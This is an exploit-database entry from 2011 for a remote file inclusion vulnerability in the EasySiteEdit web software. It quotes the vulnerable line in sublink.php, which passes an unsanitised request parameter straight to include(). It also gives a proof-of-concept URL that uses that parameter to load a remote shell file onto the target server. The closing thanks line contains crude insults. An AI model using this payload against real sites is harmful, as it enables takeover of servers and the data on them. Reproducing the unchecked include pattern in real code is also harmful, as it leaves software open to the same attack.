id: 16742
date: 08/21/2011
title: EasySiteEdit Remote File Inclusion Vulnerability
author: koskesh jakesh
cves: 

# Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat



#  0day.today [2023-03-24]  #